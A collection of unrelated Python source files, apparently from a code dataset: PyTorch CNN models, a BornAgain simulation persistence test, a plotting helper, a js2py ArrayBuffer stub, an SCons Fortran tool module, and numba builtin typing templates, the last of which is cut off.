self.conv1_dropout = nn.Dropout(conv_drop1)
self.conv2_dropout = nn.Dropout(conv_drop2)
self.fc_dropout = nn.Dropout(fc_drop)
elif dropType == 'gaussian':
self.conv1_dropout = GaussianDropout(conv_drop1)
self.conv2_dropout = GaussianDropout(conv_drop2)
self.fc_dropout = GaussianDropout(fc_drop)
if batch_norm:
self.layer1 = nn.Sequential(
nn.Conv2d(1, 16, kernel_size=5, padding=2),
nn.BatchNorm2d(16),
nn.ReLU(),
self.conv1_dropout,
nn.MaxPool2d(2))
self.layer2 = nn.Sequential(
nn.Conv2d(16, 32, kernel_size=5, padding=2),
nn.BatchNorm2d(32),
nn.ReLU(),
self.conv2_dropout,
nn.MaxPool2d(2))
else:
self.layer1 = nn.Sequential(
nn.Conv2d(1, 16, kernel_size=5, padding=2),
nn.ReLU(),
self.conv1_dropout,
nn.MaxPool2d(2))
self.layer2 = nn.Sequential(
nn.Conv2d(16, 32, kernel_size=5, padding=2),
nn.ReLU(),
self.conv2_dropout,
nn.MaxPool2d(2))
self.fc = nn.Linear(7*7*32, 10)
def forward(self, x):
out = self.layer1(x)
out = self.layer2(out)
out = out.view(out.size(0), -1)
out = self.fc_dropout(self.fc(out))
return out
class CNN(nn.Module):
def __init__(self, num_layers, dropout, size, weight_decay, in_channel, imsize, do_alexnet=False, num_classes=10):
super(CNN, self).__init__()
self.dropout = Variable(torch.FloatTensor([dropout]), requires_grad=True)
self.weight_decay = Variable(torch.FloatTensor([weight_decay]), requires_grad=True)
self.do_alexnet = do_alexnet
self.num_classes = num_classes
self.in_channel = in_channel
self.imsize = imsize
if self.do_alexnet:
self.features = nn.Sequential(
nn.Conv2d(self.in_channel, 64, kernel_size=3, stride=2, padding=1),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=2),
nn.Conv2d(64, 192, kernel_size=3, padding=1),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=2),
nn.Conv2d(192, 384, kernel_size=3, padding=1),
nn.ReLU(inplace=True),
nn.Conv2d(384, 256, kernel_size=3, padding=1),
nn.ReLU(inplace=True),
nn.Conv2d(256, 256, kernel_size=3, padding=1),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=2),
)
if imsize == 32:
self.view_size = 256 * 2 * 2
elif imsize == 28:
self.view_size = 256
self.classifier = nn.Sequential(
nn.Dropout(),
nn.Linear(self.view_size, 4096),
nn.ReLU(inplace=True),
nn.Dropout(),
nn.Linear(4096, 4096),
nn.ReLU(inplace=True),
nn.Linear(4096, self.num_classes),
)
else:
self.features = nn.Sequential(
nn.Conv2d(self.in_channel, 20, kernel_size=3, stride=2, padding=1),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=2),
)
if imsize == 32:
self.view_size = 20 * 8 * 8
elif imsize == 28:
self.view_size = 980
self.classifier = nn.Sequential(
nn.Dropout(),
nn.Linear(self.view_size, 250),
nn.ReLU(inplace=True),
#nn.Dropout(),
#nn.Linear(250, 250),
#nn.ReLU(inplace=True),
nn.Linear(250, self.num_classes),
)
def do_train(self):
self.features.train()
self.classifier.train()
def do_eval(self):
self.features.train()
self.classifier.train()
def forward(self, x):
x = self.features(x)
x = x.view(x.size(0), -1)
x = self.classifier(x)
return x
def L2_loss(self):
loss = 0
for p in self.parameters():
loss += torch.sum(torch.mul(p, p))
return loss * (10 ** self.weight_decay)
def all_L2_loss(self):
loss = 0
count = 0
for p in self.parameters():
#val = torch.flatten(p) - self.weight_decay[count: count + p.numel()]
loss += torch.sum(
torch.mul(torch.exp(self.weight_decay[count: count + p.numel()]), torch.flatten(torch.mul(p, p))))
#loss += 1e-3 * torch.sum(torch.mul(val, val))
count += p.numel()
return loss
class Net(nn.Module):
def __init__(self, num_layers, dropout, size, channel, weight_decay, num_classes=10, do_res=False,
do_classification=True):
super(Net, self).__init__()
self.dropout = Variable(torch.FloatTensor([dropout]), requires_grad=True)
self.weight_decay = Variable(torch.FloatTensor([weight_decay]), requires_grad=True)
self.imsize = size * size * channel
if not do_classification: self.imsize = size * channel
self.do_res = do_res
l_sizes = [self.imsize, self.imsize] + [50] * 20
network = []
# self.Gaussian = BernoulliDropout(self.dropout)
# network.append(nn.Dropout())
for i in range(num_layers):
network.append(nn.Linear(l_sizes[i], l_sizes[i + 1]))
# network.append(self.Gaussian)
network.append(nn.ReLU())
#network.append(nn.Dropout())
network.append(nn.Linear(l_sizes[num_layers], num_classes))
self.net = nn.Sequential(*network)
def forward(self, x):
cur_shape = x.shape
if not self.do_res:
return self.net(x.view(-1, self.imsize))# .reshape(cur_shape)
else:
res = self.net(x.view(-1, self.imsize)).reshape(cur_shape)
return x + res
def do_train(self):
self.net.train()
def do_eval(self):
self.net.eval()
def L2_loss(self):
loss = .0
for p in self.parameters():
loss = loss + torch.sum(torch.mul(p, p)) * torch.exp(self.weight_decay)
return loss
def all_L2_loss(self):
loss = .0
count = 0
for p in self.parameters():
loss = loss + torch.sum(
torch.mul(torch.exp(self.weight_decay[count: count + p.numel()]), torch.flatten(torch.mul(p, p))))
count += p.numel()
return loss
| 0.004618 |
"""
Turns a Python example into a functional persistence test via CMake machinery.
"""
import sys
import os
import glob
sys.path.append("@CMAKE_LIBRARY_OUTPUT_DIRECTORY@")
import bornagain as ba
REFERENCE_DIR = "@PYPERSIST_REFERENCE_DIR@"
EXAMPLE_DIR = "@EXAMPLE_DIR@"
EXAMPLE_NAME = "@EXAMPLE_NAME@"
OUTPUT_DIR = "@OUTPUT_DIR@"
TOLERANCE = @PYPERSIST_TOLERANCE@
sys.path.append(EXAMPLE_DIR)
example = __import__(EXAMPLE_NAME)
simulationObject = None
def get_simulation_SpecularSimulation():
"""
Returns custom simulation for SpecularSimulation.py.
"""
simulation = example.get_simulation(scan_size=10)
return simulation
def get_simulation_DepthProbe():
"""
Returns custom simulation in the case of depth probe.
"""
simulation = example.get_simulation()
beam = simulation.getInstrument().getBeam()
wavelength = beam.getWavelength()
incl_axis = simulation.getAlphaAxis()
z_axis = simulation.getZAxis()
footprint = beam.footprintFactor()
simulation.setBeamParameters(
wavelength, 10, incl_axis.getMin(), incl_axis.getMax(), footprint)
simulation.setZSpan(10, z_axis.getMin(), z_axis.getMax())
return simulation
def get_simulation_RectangularGrating():
"""
Returns custom simulation for RectangularGrating.py.
Contains smaller detector to make MC integration happy on all platforms
"""
simulation = example.get_simulation()
simulation.setDetectorParameters(5, -0.01*ba.deg, 0.01*ba.deg, 6, 0.0, 0.02*ba.deg)
return simulation
def get_simulation_GenericExample():
"""
Returns minified simulation for majority of examples. Detector size is adjusted.
The idea is that all other example's setting related to the simulation (MC integration flags,
threads settings etc) remains intact.
"""
simulation = example.get_simulation()
detector = simulation.getInstrument().getDetector()
# preserving axes range, making less bins
ax = detector.getAxis(0)
ay = detector.getAxis(1)
xmin, xmax = ax.getMin(), ax.getMax()
ymin, ymax = ay.getMin(), ay.getMax()
simulation.setDetectorParameters(5, xmin, xmax, 6, ymin, ymax)
return simulation
def get_minified_simulation():
"""
Returns a simulation constructed from example simulation with smaller detector.
"""
if "ex06_Reflectometry" in EXAMPLE_DIR:
return get_simulation_SpecularSimulation()
elif EXAMPLE_NAME == "RectangularGrating":
return get_simulation_RectangularGrating()
elif EXAMPLE_NAME == "DepthProbe":
return get_simulation_DepthProbe()
else:
return get_simulation_GenericExample()
def adjusted_simulation():
"""
Returns pre-calculated minified simulation. Function is intended for
injection into python example file.
"""
global simulationObject
return simulationObject
def run_simulation():
"""
Runs simulation and returns resulting intensity map.
"""
# create minified simulation object
global simulationObject
simulationObject = get_minified_simulation()
# INJECTION HERE: replacing get_simulation() method of example with local method
example.get_simulation = adjusted_simulation
return example.run_simulation()
def get_reffile_name(example_name):
"""
Returns full name of reference file for given basename
"""
reffiles = glob.glob(os.path.join(REFERENCE_DIR, example_name+".int.gz"))
if len(reffiles) != 1:
print("Can't find reference file in '{0}' for name '{1}'".format(REFERENCE_DIR, example_name))
print("Possible candidates", reffiles)
return None
return reffiles[0]
def save_result(result, filename):
"""
Writing result to the file with given name into test output directory.
"""
fullname = os.path.join(OUTPUT_DIR, filename)
print("Writing results in '{0}'".format(fullname))
try:
ba.IntensityDataIOFactory.writeSimulationResult(result, fullname)
except Exception as err:
print("Exception caught, failed to write file", err)
def check_result(result, example_name):
print("Checking results for '{}'".format(example_name))
reffile = get_reffile_name(example_name)
if not reffile:
save_result(result, example_name+".int.gz")
raise Exception("Absent reference file")
print("Loading reference file '{}'".format(reffile))
reference = ba.IntensityDataIOFactory.readOutputData(reffile)
diff = ba.getRelativeDifference(ba.importArrayToOutputData(result.array()), reference)
if diff > TOLERANCE:
print("Failure - Difference {0} is above tolerance level {1}".format(diff, TOLERANCE))
reffile_basename = os.path.basename(reffile)
save_result(result, reffile_basename)
raise Exception("Tolerance exceeded")
else:
print("Success - Difference {0} is below tolerance level{1}".format(diff, TOLERANCE))
def process_result(result, example_name):
try:
check_result(result, example_name)
return 0
except Exception:
return 1
def process_example():
result = run_simulation()
nfailures = 0
if type(result) is dict:
for dict_key, subresult in result.items():
nfailures += process_result(subresult, EXAMPLE_NAME + "." + str(dict_key))
else:
nfailures += process_result(result, EXAMPLE_NAME)
return nfailures
if __name__ == '__main__':
sys.exit(process_example())
| 0.002372 |
from . import header
def panel(idx,**args):
'''Switch to panel idx.
The nx,ny (and optionally gapx,gapy, and start) parameters should only
be set for the first call to panel(). Thereafter, those values will be
remembered.
There are nx,ny panels in a grid. The space between panels in the
x and y directions is controlled by gapx and gapy. By default, panels
are counted from the top left going across, then down. To start at
the bottom left going across and up, set the start keyword to 'bottom'.
idx - Current panel number, (starts counting at 1)
Optional **args:
nx - Number of panels in x direction (defaults to 1)
ny - Number of panels in y direction (defaults to 1)
gapx - space between panels in the x direction (defaults to 2)
gapy - space between panels in the y direction (defaults to 2)
start - Panel number 1 will be at the top-left ('top') or bottom-left
('bottom'). Defaults to 'top' '''
_allowed = ['nx','ny','gapx','gapy','start']
fp = header._wipopen('panel',args.keys(),_allowed)
if args.has_key('nx') and args.has_key('ny'): # start new panels
header._panelobj.resize(**args)
fp.write('set xsubmar %f\n' %header._panelobj.gapx)
fp.write('set ysubmar %f\n' %header._panelobj.gapy)
elif args.has_key('nx') or args.has_key('ny'):
header._error('panel(): you must specify nx and ny!')
if idx not in range(1,header._panelobj.nx*header._panelobj.ny+1):
header._error('panel(): idx must be between 1 and nx*ny!')
header._panelobj.idx = idx - 1
if header._panelobj.start == 'top':
fp.write('panel %d %d %d\n' %(header._panelobj.nx,header._panelobj.ny,-1*idx))
else:
fp.write('panel %d %d %d\n' %(header._panelobj.nx,header._panelobj.ny,idx))
fp.write('color %s\n' %header._optionsobj.color)
fp.write('font %s\n' %header._optionsobj.font)
fp.write('expand %s\n' %header._optionsobj.size)
fp.write('lstyle %s\n' %header._optionsobj.lstyle)
fp.write('lwidth %s\n' %header._optionsobj.lwidth)
fp.write('bgci %s\n' %header._optionsobj.bg)
fp.close()
| 0.024691 |
# this is based on jsarray.py
# todo check everything :)
from ..base import *
try:
import numpy
except:
pass
@Js
def ArrayBuffer():
a = arguments[0]
if isinstance(a, PyJsNumber):
length = a.to_uint32()
if length!=a.value:
raise MakeError('RangeError', 'Invalid array length')
temp = Js(bytearray([0]*length))
return temp
return Js(bytearray([0]))
ArrayBuffer.create = ArrayBuffer
ArrayBuffer.own['length']['value'] = Js(None)
ArrayBuffer.define_own_property('prototype', {'value': ArrayBufferPrototype,
'enumerable': False,
'writable': False,
'configurable': False})
ArrayBufferPrototype.define_own_property('constructor', {'value': ArrayBuffer,
'enumerable': False,
'writable': False,
'configurable': True})
| 0.008499 |
"""SCons.Tool.ifl
Tool-specific initialization for the Intel Fortran compiler.
There normally shouldn't be any need to import this module directly.
It will usually be imported through the generic SCons.Tool.Tool()
selection method.
"""
#
# Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009, 2010 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "src/engine/SCons/Tool/ifl.py 5023 2010/06/14 22:05:46 scons"
import SCons.Defaults
from SCons.Scanner.Fortran import FortranScan
from FortranCommon import add_all_to_env
def generate(env):
"""Add Builders and construction variables for ifl to an Environment."""
fscan = FortranScan("FORTRANPATH")
SCons.Tool.SourceFileScanner.add_scanner('.i', fscan)
SCons.Tool.SourceFileScanner.add_scanner('.i90', fscan)
if 'FORTRANFILESUFFIXES' not in env:
env['FORTRANFILESUFFIXES'] = ['.i']
else:
env['FORTRANFILESUFFIXES'].append('.i')
if 'F90FILESUFFIXES' not in env:
env['F90FILESUFFIXES'] = ['.i90']
else:
env['F90FILESUFFIXES'].append('.i90')
add_all_to_env(env)
env['FORTRAN'] = 'ifl'
env['SHFORTRAN'] = '$FORTRAN'
env['FORTRANCOM'] = '$FORTRAN $FORTRANFLAGS $_FORTRANINCFLAGS /c $SOURCES /Fo$TARGET'
env['FORTRANPPCOM'] = '$FORTRAN $FORTRANFLAGS $CPPFLAGS $_CPPDEFFLAGS $_FORTRANINCFLAGS /c $SOURCES /Fo$TARGET'
env['SHFORTRANCOM'] = '$SHFORTRAN $SHFORTRANFLAGS $_FORTRANINCFLAGS /c $SOURCES /Fo$TARGET'
env['SHFORTRANPPCOM'] = '$SHFORTRAN $SHFORTRANFLAGS $CPPFLAGS $_CPPDEFFLAGS $_FORTRANINCFLAGS /c $SOURCES /Fo$TARGET'
def exists(env):
return env.Detect('ifl')
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
| 0.004274 |
from __future__ import print_function, division, absolute_import
import itertools
from numba import types, intrinsics
from numba.utils import PYVERSION, RANGE_ITER_OBJECTS, operator_map
from numba.typing.templates import (AttributeTemplate, ConcreteTemplate,
AbstractTemplate, builtin_global, builtin,
builtin_attr, signature, bound_function,
make_callable_template)
for obj in RANGE_ITER_OBJECTS:
builtin_global(obj, types.range_type)
builtin_global(len, types.len_type)
builtin_global(slice, types.slice_type)
builtin_global(abs, types.abs_type)
builtin_global(print, types.print_type)
@builtin
class Print(ConcreteTemplate):
key = types.print_type
intcases = [signature(types.none, ty) for ty in types.integer_domain]
realcases = [signature(types.none, ty) for ty in types.real_domain]
cases = intcases + realcases
@builtin
class PrintOthers(AbstractTemplate):
key = types.print_type
def accepted_types(self, ty):
if ty in types.integer_domain or ty in types.real_domain:
return True
if isinstance(ty, types.CharSeq):
return True
def generic(self, args, kws):
assert not kws, "kwargs to print is not supported."
for a in args:
if not self.accepted_types(a):
raise TypeError("Type %s is not printable." % a)
return signature(types.none, *args)
@builtin
class Abs(ConcreteTemplate):
key = types.abs_type
int_cases = [signature(ty, ty) for ty in types.signed_domain]
real_cases = [signature(ty, ty) for ty in types.real_domain]
complex_cases = [signature(ty.underlying_float, ty)
for ty in types.complex_domain]
cases = int_cases + real_cases + complex_cases
@builtin
class Slice(ConcreteTemplate):
key = types.slice_type
cases = [
signature(types.slice3_type),
signature(types.slice3_type, types.none, types.none),
signature(types.slice3_type, types.none, types.intp),
signature(types.slice3_type, types.intp, types.none),
signature(types.slice3_type, types.intp, types.intp),
signature(types.slice3_type, types.intp, types.intp, types.intp),
signature(types.slice3_type, types.none, types.intp, types.intp),
signature(types.slice3_type, types.intp, types.none, types.intp),
signature(types.slice3_type, types.none, types.none, types.intp),
]
@builtin
class Range(ConcreteTemplate):
key = types.range_type
cases = [
signature(types.range_state32_type, types.int32),
signature(types.range_state32_type, types.int32, types.int32),
signature(types.range_state32_type, types.int32, types.int32,
types.int32),
signature(types.range_state64_type, types.int64),
signature(types.range_state64_type, types.int64, types.int64),
signature(types.range_state64_type, types.int64, types.int64,
types.int64),
signature(types.unsigned_range_state64_type, types.uint64),
signature(types.unsigned_range_state64_type, types.uint64, types.uint64),
signature(types.unsigned_range_state64_type, types.uint64, types.uint64,
types.uint64),
]
@builtin
class GetIter(AbstractTemplate):
key = "getiter"
def generic(self, args, kws):
assert not kws
[obj] = args
if isinstance(obj, types.IterableType):
return signature(obj.iterator_type, obj)
@builtin
class IterNext(AbstractTemplate):
key = "iternext"
def generic(self, args, kws):
assert not kws
[it] = args
if isinstance(it, types.IteratorType):
return signature(types.Pair(it.yield_type, types.boolean), it)
@builtin
class PairFirst(AbstractTemplate):
"""
Given a heterogenous pair, return the first element.
"""
key = "pair_first"
def generic(self, args, kws):
assert not kws
[pair] = args
if isinstance(pair, types.Pair):
return signature(pair.first_type, pair)
@builtin
class PairSecond(AbstractTemplate):
"""
Given a heterogenous pair, return the second element.
"""
key = "pair_second"
def generic(self, args, kws):
assert not kws
[pair] = args
if isinstance(pair, types.Pair):
return signature(pair.second_type, pair)
def choose_result_bitwidth(*inputs):
return max(types.intp.bitwidth, *(tp.bitwidth for tp in inputs))
def choose_result_int(*inputs):
"""
Choose the integer result type for an operation on integer inputs,
according to the integer typing NBEP.
"""
bitwidth = choose_result_bitwidth(*inputs)
signed = any(tp.signed for tp in inputs)
return types.Integer.from_bitwidth(bitwidth, signed)
# The "machine" integer types to take into consideration for operator typing
# (according to the integer typing NBEP)
machine_ints = (
sorted(set((types.intp, types.int64))) +
sorted(set((types.uintp, types.uint64)))
)
# Explicit integer rules for binary operators; smaller ints will be
# automatically upcast.
integer_binop_cases = tuple(
signature(choose_result_int(op1, op2), op1, op2)
for op1, op2 in itertools.product(machine_ints, machine_ints)
)
class BinOp(ConcreteTemplate):
cases = list(integer_binop_cases)
cases += [signature(op, op, op) for op in sorted(types.real_domain)]
cases += [signature(op, op, op) for op in sorted(types.complex_domain)]
@builtin
class BinOpAdd(BinOp):
key = "+"
@builtin
class BinOpSub(BinOp):
key = "-"
@builtin
class BinOpMul(BinOp):
key = "*"
@builtin
class BinOpDiv(BinOp):
key = "/?"
@builtin
class BinOpMod(ConcreteTemplate):
key = "%"
cases = list(integer_binop_cases)
cases += [signature(op, op, op) for op in sorted(types.real_domain)]
@builtin
class BinOpTrueDiv(ConcreteTemplate):
key = "/"
cases = [signature(types.float64, op1, op2)
for op1, op2 in itertools.product(machine_ints, machine_ints)]
cases += [signature(op, op, op) for op in sorted(types.real_domain)]
cases += [signature(op, op, op) for op in sorted(types.complex_domain)]
@builtin
class BinOpFloorDiv(ConcreteTemplate):
key = "//"
cases = list(integer_binop_cases)
cases += [signature(op, op, op) for op in sorted(types.real_domain)]
@builtin
class BinOpPower(ConcreteTemplate):
key = "**"
cases = list(integer_binop_cases)
cases += [signature(types.float64, types.float64, op)
for op in sorted(types.signed_domain)]
cases += [signature(types.float64, types.float64, op)
for op in sorted(types.unsigned_domain)]
cases += [signature(op, op, op)
for op in sorted(types.real_domain)]
cases += [signature(op, op, op)
for op in sorted(types.complex_domain)]
class PowerBuiltin(BinOpPower):
key = pow
# TODO add 3 operand version
builtin_global(pow, types.Function(PowerBuiltin))
class BitwiseShiftOperation(ConcreteTemplate):
cases = list(integer_binop_cases)
@builtin
class BitwiseLeftShift(BitwiseShiftOperation):
key = "<<"
@builtin
class BitwiseRightShift(BitwiseShiftOperation):
key = ">>"
class BitwiseLogicOperation(BinOp):
cases = list(integer_binop_cases)
@builtin
class BitwiseAnd(BitwiseLogicOperation):
key = "&"
@builtin
class BitwiseOr(BitwiseLogicOperation):
key = "|"
@builtin
class BitwiseXor(BitwiseLogicOperation):
key = "^"
# Bitwise invert and negate are special: we must not upcast the operand
# for unsigned numbers, as that would change the result.
# (i.e. ~np.int8(0) == 255 but ~np.int32(0) == 4294967295).
@builtin
class BitwiseInvert(ConcreteTemplate):
key = "~"
cases = [signature(types.int8, types.boolean)]
cases += [signature(choose_result_int(op), op) for op in types.unsigned_domain]
cases += [signature(choose_result_int(op), op) for op in types.signed_domain]
class UnaryOp(ConcreteTemplate):
cases = [signature(choose_result_int(op), op) for op in types.unsigned_domain]
cases += [signature(choose_result_int(op), op) for op in types.signed_domain]
cases += [signature(op, op) for op in sorted(types.real_domain)]
cases += [signature(op, op) for op in sorted(types.complex_domain)]
@builtin
class UnaryNegate(UnaryOp):
key = "-"
@builtin
class UnaryPositive(UnaryOp):
key = "+"
@builtin
class UnaryNot(ConcreteTemplate):
key = "not"
cases = [signature(types.boolean, types.boolean)]
cases += [signature(types.boolean, op) for op in sorted(types.signed_domain)]
cases += [signature(types.boolean, op) for op in sorted(types.unsigned_domain)]
cases += [signature(types.boolean, op) for op in sorted(types.real_domain)]
cases += [signature(types.boolean, op) for op in sorted(types.complex_domain)]
class OrderedCmpOp(ConcreteTemplate):
cases = [signature(types.boolean, types.boolean, types.boolean)]
cases += [signature(types.boolean, op, op) for op in sorted(types.signed_domain)]
cases += [signature(types.boolean, op, op) for op in sorted(types.unsigned_domain)]
cases += [signature(types.boolean, op, op) for op in sorted(types.real_domain)]
class UnorderedCmpOp(ConcreteTemplate):
cases = OrderedCmpOp.cases + [
signature(types.boolean, op, op) for op in sorted(types.complex_domain)]
@builtin
class CmpOpLt(OrderedCmpOp):
key = '<'
@builtin
class CmpOpLe(OrderedCmpOp):
key = '<='
@builtin
class CmpOpGt(OrderedCmpOp):
key = '>'
@builtin
class CmpOpGe(OrderedCmpOp):
key = '>='
@builtin
class CmpOpEq(UnorderedCmpOp):
key = '=='
@builtin
class CmpOpNe(UnorderedCmpOp):
key = '!='
class TupleCompare(AbstractTemplate):
def generic(self, args, kws):
[lhs, rhs] = args
if isinstance(lhs, types.BaseTuple) and isinstance(rhs, types.BaseTuple):
for u, v in zip(lhs, rhs):
# Check element-wise comparability
res = self.context.resolve_function_type(self.key, (u, v), {})
if res is None:
break
else:
return signature(types.boolean, lhs, rhs)
@builtin
class TupleEq(TupleCompare):
key = '=='
@builtin
class TupleNe(TupleCompare):
key = '!='
@builtin
class TupleGe(TupleCompare):
key = '>='
@builtin
class TupleGt(TupleCompare):
key = '>'
@builtin
class TupleLe(TupleCompare):
key = '<='
@builtin
class TupleLt(TupleCompare):
key = '<'
# Register default implementations of binary inplace operators for
# immutable types.
class InplaceImmutable(AbstractTemplate):
def generic(self, args, kws):
lhs, rhs = args
if not lhs.mutable:
return self.context.resolve_function_type(self.key[:-1], args, kws)
# Inplace ops on mutable arguments must be typed explicitly
for _binop, _inp, op in operator_map:
if _inp:
template = type('InplaceImmutable_%s' % _binop,
(InplaceImmutable,),
dict(key=op + '='))
builtin(template)
class CmpOpIdentity(AbstractTemplate):
def generic(self, args, kws):
[lhs, rhs] = args
return signature(types.boolean, lhs, rhs)
@builtin
class CmpOpIs(CmpOpIdentity):
key = 'is'
@builtin
class CmpOpIsNot(CmpOpIdentity):
key = 'is not'
def normalize_1d_index(index):
"""
Normalize the *index* type (an integer or slice) for indexing a 1D
sequence.
"""
if index == types.slice3_type:
return types.slice3_type
elif isinstance(index, types.Integer):
return types.intp if index.signed else types.uintp
@builtin
class GetItemCPointer(AbstractTemplate):
key = "getitem"
def generic(self, args, kws):
assert not kws
ptr, idx = args
if isinstance(ptr, types.CPointer) and isinstance(idx, types.Integer):
return signature(ptr.dtype, ptr, normalize_1d_index(idx))
@builtin
class SetItemCPointer(AbstractTemplate):
key = "setitem"
def generic(self, args, kws):
assert not kws
ptr, idx, val = args
if isinstance(ptr, types.CPointer) and isinstance(idx, types.Integer):
return signature(types.none, ptr, normalize_1d_index(idx), ptr.dtype)
@builtin
class Len(AbstractTemplate):
key = types.len_type
def generic(self, args, kws):
assert not kws
(val,) = args
if isinstance(val, (types.Buffer, types.BaseTuple)):
return signature(types.intp, val)
@builtin
class TupleBool(AbstractTemplate):
key = "is_true"
def generic(self, args, kws):
assert not kws
(val,) = args
if isinstance(val, (types.BaseTuple)):
return signature(types.boolean, val)
#-------------------------------------------------------------------------------
@builtin_attr
class MemoryViewAttribute(AttributeTemplate):
key = types.MemoryView
if PYVERSION >= (3,):
def resolve_contiguous(self, buf):
return types.boolean
def resolve_c_contiguous(self, buf):
return types.boolean
def resolve_f_contiguous(self, buf):
return types.boolean
def resolve_itemsize(self, buf):
return types.intp
def resolve_nbytes(self, buf):
return types.intp
def resolve_readonly(self, buf):
return types.boolean
def resolve_shape(self, buf):
return types.UniTuple(types.intp, buf.ndim)
def resolve_strides(self, buf):
return types.UniTuple(types.intp, buf.ndim)
def resolve_ndim(self, buf):
return types.intp
#-------------------------------------------------------------------------------
@builtin_attr
class BooleanAttribute(AttributeTemplate):
key = types.Boolean
def resolve___class__(self, ty):
return types.NumberClass(ty)
@builtin_attr
class NumberAttribute(AttributeTemplate):
key = types.Number
def resolve___class__(self, ty):
return types.NumberClass(ty)
def resolve_real(self, ty):
return getattr(ty, "underlying_float", ty)
def resolve_imag(self, ty):
return getattr(ty, "underlying_float", ty)
@bound_function("complex.conjugate")
def resolve_conjugate(self, ty, args, kws):
assert not args
assert not kws
return signature(ty)
@builtin_attr
class SliceAttribute(AttributeTemplate):
key = types.slice3_type
def resolve_start(self, ty):
return types.intp
def resolve_stop(self, ty):
return types.intp
def resolve_step(self, ty):
return types.intp
#-------------------------------------------------------------------------------
@builtin_attr
class NumberClassAttribute(AttributeTemplate):
key = types.NumberClass
def resolve___call__(self, classty):
"""
Resolve a number class's constructor (e.g. calling int(...))
"""
ty = classty.instance_type
def typer(val):
return ty
return types.Function(make_callable_template(key=ty, typer=typer))
def register_number_classes(register_global):
nb_types = set(types.number_domain)
nb_types.add(types.bool_)
for ty in nb_types:
register_global(ty, types.NumberClass(ty))
register_number_classes(builtin_global)
#------------------------------------------------------------------------------
class Max(AbstractTemplate):
key = max
def generic(self, args, kws):
assert not kws
# max(a, b, ...)
if len(args) < 2:
return
for a in args:
if a not in types.number_domain:
return
retty = self.context.unify_types(*args)
if retty is not None:
return signature(retty, *args)
class Min(AbstractTemplate):
key = min
def generic(self, args, kws):
assert not kws
# min(a, b, ...)
if len(args) < 2:
return
for a in args:
if a not in types.number_domain:
return
retty = self.context.unify_types(*args)
if retty is not None:
return signature(retty, *args)
class Round(ConcreteTemplate):
key = round
if PYVERSION < (3, 0):
cases = [
signature(types.float32, types.float32),
signature(types.float64, types.float64),
]
else:
cases = [
signature(types.intp, types.float32),
signature(types.int64, types.float64),
]
cases += [
signature(types.float32, types.float32, types.intp),
signature(types.float64, types.float64, types.intp),
]
builtin_global(max, types.Function(Max))
builtin_global(min, types.Function(Min))
builtin_global(round, types.Function(Round))
#------------------------------------------------------------------------------
class Bool(AbstractTemplate):
key = bool
def generic(self, args, kws):
assert not kws
[arg] = args
if isinstance(arg, (types.Boolean, types.Number)):
return signature(types.boolean, arg)
# XXX typing for bool cannot be polymorphic because of the
# types.Function thing, so we redirect to the "is_true"
# intrinsic.
return self.context.resolve_function_type("is_true", args, kws)
class Int(AbstractTemplate):
key = int
def generic(self, args, kws):
assert not kws
[arg] = args
if isinstance(arg, types.Integer):
return signature(arg, arg)
if isinstance(arg, (types.Float, types.Boolean)):
return signature(types.intp, arg)
class Float(AbstractTemplate):
key = float
def generic(self, args, kws):
assert not kws
[arg] = args
if arg not in types.number_domain:
raise TypeError("float() only support for numbers")
if arg in types.complex_domain:
raise TypeError("float() does not support complex")
if arg in types.integer_domain:
return signature(types.float64, arg)
elif arg in types.real_domain:
return signature(arg, arg)
class Complex(AbstractTemplate):
key = complex
def generic(self, args, kws):
assert not kws
if len(args) == 1:
[arg] = args
if arg not in types.number_domain:
raise TypeError("complex() only support for numbers")
if arg == types.float32:
return signature(types.complex64, arg)
else:
return signature(types.complex128, arg)
elif len(args) == 2:
[real, imag] = args
if (real not in types.number_domain or
imag not in types.number_domain):
raise TypeError("complex() only support for numbers")
if real == imag == types.float32:
return signature(types.complex64, real, imag)
else:
return signature(types.complex128, real, imag)
builtin_global(bool, types.Function(Bool))
builtin_global(int, types.Function(Int))
builtin_global(float, types.Function(Float))
builtin_global(complex, types.Function(Complex))
#------------------------------------------------------------------------------
@builtin
class Enumerate(AbstractTemplate):
key = enumerate
def generic(self, args, kws):
assert not kws
it = args[0]
if len(args) > 1 and not args[1] in types.integer_domain:
raise TypeError("Only integers supported as start value in "
"enumerate")
elif len(args) > 2:
#let python raise its own error
enumerate(*args)
if isinstance(it, types.IterableType):
enumerate_type = types.EnumerateType(it)
return signature(enumerate_type, *args)
builtin_global(enumerate, types.Function(Enumerate))
@builtin
class Zip(AbstractTemplate):
key = zip
def generic(self, args, kws):
assert not kws
if all(isinstance(it, types.IterableType) for it in args):
zip_type = types.ZipType(args)
return signature(zip_type, *args)
builtin_global(zip, types.Function(Zip))
@builtin
class Intrinsic_array_ravel(AbstractTemplate):
key = intrinsics.array_ravel
def generic(self, args, kws):
assert not kws
[arr] = args
if arr.layout in 'CF' and arr.ndim >= 1:
return signature(arr.copy(ndim=1), arr)
builtin_global(intrinsics.array_ravel, types.Function(Intrinsic_array_ravel))
#------------------------------------------------------------------------------
@builtin
class TypeBuiltin(AbstractTemplate):
key = type
def generic(self, args, kws):
